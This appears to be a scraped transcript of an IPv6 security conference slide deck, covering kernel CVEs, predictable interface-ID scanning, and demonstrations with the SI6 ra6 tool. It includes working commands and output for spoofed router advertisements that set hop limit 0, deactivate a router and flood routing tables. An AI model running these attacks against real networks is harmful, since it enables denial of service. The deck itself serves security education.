IPv6 Security Potpourri
description
Transcript of IPv6 Security Potpourri
![Page 1: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/1.jpg)
IPv6 Security Potpourri
Matthias Schmidt@_xhr_
![Page 2: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/2.jpg)
Why bother?
![Page 3: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/3.jpg)
IPv4 in productionsince decades
![Page 4: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/4.jpg)
IPv6 in productionsince ...
![Page 5: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/5.jpg)
IPv6 is deployedalongside with v4
![Page 6: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/6.jpg)
Security Obstacles
FirewallsIPS/IDS
Access Control Lists
VPNs
NACs
Blacklists
![Page 7: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/7.jpg)
IPv6 maturity?
![Page 8: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/8.jpg)
CVE20134162
Flaw in setsockopt UDP_CORK option in the Linux kernel's IPv6 stack. A local user could exploit this flaw to cause a denial of service (system crash).
CVE20132232
A flaw was discovered in the Linux kernel when an IPv6 socket is used to connect to an IPv4 destination. An unprivileged local user could exploit this flaw to cause a denial of service (system crash).
CVE20134387
Flaw in the Linux kernel's UDP Fragmentation Offload (UFO). An unprivileged local user could exploit this flaw to cause a denial of service (system crash) or possibly gain administrative privileges.
![Page 9: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/9.jpg)
Date: Mon, 04 Mar 2013 07:01:10 +0100From: Marc HeuseTo: fulldisclosureSubject: Remote system freeze thanks to Kaspersky Internet
[...]
Kaspersky Internet Security 2013 (and any other Kaspersky product which includes the firewall funcionality) is susceptible to a remote system freeze. As of the 3rd March 2013, the bug is still unfixed.
If IPv6 connectivity to a victim is possible (which is always the case on local networks), a fragmented packet with multiple but one large extension header leads to a complete freeze of the operating system.
[...]
![Page 10: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/10.jpg)
IPv6 Privacy?
Multiple addresses per Interface
Happy Eyeballs
IPv4 only VPN
Host Tracking
Static prefix
![Page 11: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/11.jpg)
Keep the security levelbalanced
![Page 12: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/12.jpg)
New threats
... or not so new
![Page 13: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/13.jpg)
Address Space Scanning
![Page 14: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/14.jpg)
2128 ... 264 ... 232
![Page 15: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/15.jpg)
Exploit IIDs
![Page 16: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/16.jpg)
Embedded MAC Address
2001:8d8:1fe:303:d6be:d9ff:fe60:dd7c
![Page 17: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/17.jpg)
Embedded IPv4 Address
2001:db8:122:344::192.0.2.332001:db8:122:344::192:0:2:33
![Page 18: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/18.jpg)
Low-byte address*
2a01:e0c:1::1
![Page 19: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/19.jpg)
Wordy address*
2a03:2880:2110:3f07:face:b00c:0:1
![Page 20: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/20.jpg)
Embedded port number
2001:4f8:3:7::25
![Page 21: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/21.jpg)
Alexa T1M AAAA
![Page 22: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/22.jpg)
24,145 IPv6 addresses in total
![Page 23: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/23.jpg)
** IPv6 General Address Analysis **
Total IPv6 addresses: 24145Unicast: 24141 (99.98%) Multicast: 0 (0.00%)Unspec.: 4 (0.02%)
** IPv6 Unicast Addresses **
Loopback: 29 (0.12%) IPv4-mapped: 63 (0.26%)IPv4-compat.: 6 (0.02%) Link-local: 19 (0.08%)Site-local: 0 (0.00%) Unique-local: 0 (0.00%)6to4: 137 (0.57%) Teredo: 0 (0.00%)Global: 23887 (98.95%)
** IPv6 Interface IDs **
Total IIDs analyzed: 24043IEEE-based: 127 (0.53%) Low-byte: 11680 (48.58%)Embed-IPv4: 3914 (16.28%) Embed-IPv4 (64): 1156 (4.81%)Embed-port: 407 (1.69%) Embed-port (r): 28 (0.12%)ISATAP: 0 (0.00%) Byte-pattern: 4149 (17.26%)Randomized: 2651 (11.03%)
![Page 24: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/24.jpg)
Examples
![Page 25: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/25.jpg)
$ host 2001:1900:2268:1:207:123:150:277.2.[...].ip6.arpa domain name pointer www.ncjrs.gov.$ host 207.123.150.2727.150.123.207 domain name pointer www.ncjrs.gov.
$ host 2001:8d8:0:5::188.1.[...].ip6.[...] ae-4.gw-diste.bs.kae.de.oneandone.net.
$ host 2001:4f8:3:7::255.2.[...].ip6.arpa domain name pointer mail.NetBSD.org.
$ host 2001:41b8:202:deb:213:21ff:fe20:14266.2.[...].arpa domain name pointer listera.torproject.org.
![Page 26: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/26.jpg)
How to analyze?
![Page 27: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/27.jpg)
addr6 from SI6 Networks
ieee
lowbyte
embedport
bytepattern...
ipv4all
![Page 28: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/28.jpg)
How to scan?
![Page 29: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/29.jpg)
scan6 from SI6 Networks
IEEE OUIs
Embedded ports ...
Special IIDs
![Page 30: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/30.jpg)
Malicious Hop Limit
![Page 31: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/31.jpg)
0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +++++++++++++++++++++++++++++++++ | Type | Code | Checksum | +++++++++++++++++++++++++++++++++ | Cur Hop Limit |M|O| Reserved | Router Lifetime | +++++++++++++++++++++++++++++++++ | Reachable Time | +++++++++++++++++++++++++++++++++ | Retrans Timer | +++++++++++++++++++++++++++++++++ | Options ... ++++++++++++
Router Advertisement Message Format
The default value that should be placed in the Hop Count field of the IP header for outgoing IP packets.
![Page 32: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/32.jpg)
# ra6 i em0 s fe80::a00:27ff:fe9d:4980 c 0 v d ff02::1 l z 1
Ethernet Source Address: 6b:88:4b:8a:d8:d3Ethernet Destination Address: 33:33:00:00:00:01 (allnodes multicast)IPv6 Source Address: fe80::a00:27ff:fe9d:4980IPv6 Destination Address: ff02::1IPv6 Hop Limit: 255 (default)Cur Hop Limit: 0 Preference: 1 Flags: none Router Lifetime: 9000Reachable Time: 4294967295 Retrans Timer: 4000Initial attack packet(s) sent successfully.
Now sending Router Advertisements every 1 second...
![Page 33: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/33.jpg)
# ping6 fbsdPING fbsd(fbsd) 56 data bytes
64 bytes from fbsd: icmp_seq=1 ttl=63 time=0.645 ms64 bytes from fbsd: icmp_seq=2 ttl=63 time=0.795 ms64 bytes from fbsd: icmp_seq=3 ttl=63 time=1.01 ms
From freebsdrouter icmp_seq=4 Time exceeded: Hop limit[...]
![Page 34: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/34.jpg)
Deactivate a Router
![Page 35: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/35.jpg)
0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +++++++++++++++++++++++++++++++++ | Type | Code | Checksum | +++++++++++++++++++++++++++++++++ | Cur Hop Limit |M|O| Reserved | Router Lifetime | +++++++++++++++++++++++++++++++++ | Reachable Time | +++++++++++++++++++++++++++++++++ | Retrans Timer | +++++++++++++++++++++++++++++++++ | Options ... ++++++++++++
Router Advertisement Message Format
A Lifetime of 0 indicates that the router is not a default router and SHOULD NOT appear on the default router's list
![Page 36: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/36.jpg)
root@hipv6debianhost:~# ip 6 r s
fc00:1::/64 dev eth0 proto kernel metric 256 expires 2592155sec mtu 1500 advmss 1440 hoplimit 0
fe80::/64 dev eth0 proto kernel metric 256 mtu 1500 advmss 1440 hoplimit 0
default via fe80::a00:27ff:fe9d:4980 dev eth0 proto kernel metric 1024 expires 1793sec mtu 1500 advmss 1440 hoplimit 64
![Page 37: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/37.jpg)
# ra6 i em0 s fe80::a00:27ff:fe9d:4980 t 0 v d ff02::1Ethernet Source Address: 05:70:d2:6e:2d:88 Ethernet Destination Address: 33:33:00:00:00:01 (allnodes multicast)IPv6 Source Address: fe80::a00:27ff:fe9d:4980IPv6 Destination Address: ff02::1IPv6 Hop Limit: 255 (default)Cur Hop Limit: 255 Preference: 1 Flags: none Router Lifetime: 0Reachable Time: 4294967295 Retrans Timer: 4000
Initial attack packet(s) sent successfully.
![Page 38: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/38.jpg)
root@hipv6debianhost:~# ip 6 r s
fc00:1::/64 dev eth0 proto kernel metric 256 expires 2592056sec mtu 1500 advmss 1440 hoplimit 0
fe80::/64 dev eth0 proto kernel metric 256 mtu 1500 advmss 1440 hoplimit 0
![Page 39: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/39.jpg)
Router Advertisement Flooding
![Page 40: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/40.jpg)
# ra6 i em0 s fe80::a00:27ff:fe9d:4980 c 0 v d ff02::1 l z 1
Ethernet Source Address: 6b:88:4b:8a:d8:d3Ethernet Destination Address: 33:33:00:00:00:01 (allnodes multicast)IPv6 Source Address: fe80::a00:27ff:fe9d:4980IPv6 Destination Address: ff02::1IPv6 Hop Limit: 255 (default)Cur Hop Limit: 0 Preference: 1 Flags: none Router Lifetime: 9000Reachable Time: 4294967295 Retrans Timer: 4000Initial attack packet(s) sent successfully.
Now sending Router Advertisements every 1 second...
![Page 41: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/41.jpg)
root@hipv6debianhost:~# ip 6 r sfc00:1::/64 dev eth0 proto kernel metric 256 expires 2591948sec mtu 1500 advmss 1440 hoplimit 0
fe80::/64 dev eth0 proto kernel metric 256 mtu 1500 advmss 1440 hoplimit 0
default via fe80::a00:27ff:fe9d:4980 dev eth0 proto kernel metric 1024 expires 1586sec mtu 1500 advmss 1440 hoplimit 64default via fe80::e205:edce:9f12:5244 dev eth0 proto kernel metric 1024 expires 8996sec mtu 1500 advmss 1440 hoplimit 255default via fe80::c989:7938:4241:9924 dev eth0 proto kernel metric 1024 expires 8996sec mtu 1500 advmss 1440 hoplimit 255default via fe80::ba:74:aa4d:94d dev eth0 proto kernel metric 1024 expires 8996sec mtu 1500 advmss 1440 hoplimit 255[...]
![Page 42: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/42.jpg)
Great Tools from great ppl
Fernando Gont Van Hauser
SI6 IPv6 toolkit THC IPv6 toolkit
![Page 43: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/43.jpg)
Still a long way to go...
![Page 44: IPv6 Security Potpourri](https://reader036.fdocuments.us/reader036/viewer/2022081504/558cac59d8b42ae47a8b45d5/html5/thumbnails/44.jpg)
Fin!